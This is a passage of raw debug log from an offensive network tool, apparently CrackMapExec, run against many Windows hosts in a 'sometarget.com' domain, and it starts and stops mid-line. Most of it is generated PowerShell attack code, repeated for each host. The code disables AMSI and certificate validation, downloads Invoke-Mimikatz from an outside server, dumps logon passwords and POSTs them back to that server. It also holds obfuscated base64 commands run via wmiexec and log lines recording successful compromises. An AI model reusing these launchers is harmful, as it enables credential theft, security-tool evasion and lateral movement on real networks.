HAAbwBuAHMAZQAoACkA" | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv HR -;sv WV ec;sv Wa ((gv HR).value.toString()+(gv WV).value.toString());powershell (gv Wa).value.toString() CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
MIMIKATZ 172.23.2.33 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB ACTSMAD.sometarget.com 445 ACTSMAD [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
MIMIKATZ TLCANISTER.sometarget.com 445 TLCANISTER [+] Executed launcher | |
MIMIKATZ SRV3.sometarget.com 445 SRV3 [+] Executed launcher | |
MIMIKATZ SRV7.sometarget.com 445 SRV7 [+] Executed launcher | |
MIMIKATZ SRV1.sometarget.com 445 SRV1 [+] Executed launcher | |
MIMIKATZ 172.23.2.29 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB ACTSM1.sometarget.com 445 ACTSM1 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
MIMIKATZ 172.23.3.248 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode. | |
Download it from https://www.dlitz.net/software/pycrypto | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB CIVRTST02.sometarget.com 445 CIVRTST02 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode. | |
Download it from https://www.dlitz.net/software/pycrypto | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB CCOGNOS01.sometarget.com 445 CCOGNOS01 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Target system is CIVRTST02.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\CIVRTST02[\\PIPE\\atsvc] | |
DEBUG StringBinding: CIVRTST02[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:CIVRTST02.sometarget.com[49154] | |
DEBUG Target system is ACTSMAD.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\ACTSMAD[\\PIPE\\atsvc] | |
DEBUG StringBinding: ACTSMAD[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:ACTSMAD.sometarget.com[49154] | |
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode. | |
Download it from https://www.dlitz.net/software/pycrypto | |
DEBUG Target system is CCOGNOS01.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\CCOGNOS01[\\PIPE\\atsvc] | |
DEBUG StringBinding: CCognos01[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:CCOGNOS01.sometarget.com[49154] | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
MIMIKATZ 172.23.2.117 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ CDC01.sometarget.com 445 CDC01 [+] Executed launcher | |
MIMIKATZ CDRDC01.sometarget.com 445 CDRDC01 [+] Executed launcher | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB CIVRTST01.sometarget.com 445 CIVRTST01 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv Or -;sv Rx ec;sv Wb ((gv Or).value.toString()+(gv Rx).value.toString());powershell (gv Wb).value.toString() CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
DEBUG Target system is ACTSM1.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\ACTSM1[\\PIPE\\atsvc] | |
DEBUG StringBinding: ACTSM1[49154] | |
